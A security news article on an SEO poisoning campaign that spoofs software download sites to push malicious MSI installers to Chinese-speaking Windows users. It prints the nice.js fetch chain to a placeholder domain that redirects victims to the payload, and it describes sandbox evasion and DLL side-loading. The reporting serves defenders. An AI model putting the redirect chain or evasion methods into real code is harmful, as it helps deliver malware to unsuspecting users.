New SEO Poisoning Attacking Windows Users With Weaponized Software Sites

In August 2025, security researchers uncovered a sophisticated SEO poisoning campaign targeting Chinese-speaking Windows users.

By manipulating search result rankings with tailored SEO plugins and registering lookalike domains, attackers successfully masqueraded malicious software download sites as legitimate providers.

Victims searching for popular applications such as DeepL were redirected to spoofed pages bearing minimal character substitutions and convincing language, prompting them to download weaponized installers instead of genuine software.

This technique allowed threat actors to reach a broad audience without requiring direct phishing emails or social engineering beyond the fake domains.

Fortinet analysts identified multiple fraudulent domains ranking highly in search engines, each designed to distribute a combination of legitimate application binaries and malicious payloads.

Upon visiting one such site, a JavaScript-based loader named nice.js orchestrates a multi-step download process that dynamically retrieves JSON responses to determine the final installer URL.

This seamless injection of malware into the installation flow makes detection by casual users virtually impossible.

The stolen credentials and system data collected by these weaponized installers can then be leveraged for further compromise, lateral movement, or sale on underground markets.

The impact of this campaign extends beyond simple credential theft. Once executed, the MSI installer elevates itself to administrator privileges and drops several components—including a debug-linked DLL, fragmented ZIP archives, and auxiliary files—into system directories.

An anti-analysis routine within the primary DLL conducts parent process checks, sleep integrity verification via HTTP date queries, and ACPI table inspections to evade sandboxing and virtualization environments.

Only after these checks does the malware reconstruct and decompress its payload, ensuring robust deployment on genuine end-user machines.

Infection Mechanism

The core of the infection mechanism lies in the nice.js script embedded within the spoofed sites.

Upon page load, the script executes a request sequence as follows:-

fetch(`https://spoofeddomain.com/api/download?device=${deviceType}&domain=${currentDomain}`)
  .then(response => response.json())
  .then(data => fetch(data.secondaryLink))
  .then(response => response.json())
  .then(data => window.location.href = data.finalUrl);

This chain of JSON-based redirects not only obscures the malicious content delivery but also allows the threat actor to tailor payloads based on the victim’s device type and domain origin.

Once the user is redirected to the final URL, the MSI package blends a legitimate DeepL installer with the malicious EnumW.dll, which is referenced to a debug path on the attacker’s system.

The EnumW.dll file triggers a custom action within Windows Installer to execute its ooo89 function, initiating anti-analysis checks before payload extraction.

The fragmented ZIP archives (temp_data_1 through temp_data_55) are reconstructed into an emoji.dat file, decompressed, and deployed under a unique directory named plsamc{systemUptime} in the user profile.

Subsequent side-loading of a packed vstdlib.dll by searching for sibling EXE files ensures persistence and complicates forensic analysis.

The attack flows from the initial search result to the final payload execution, highlighting the stealth and sophistication of this SEO poisoning operation.

Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.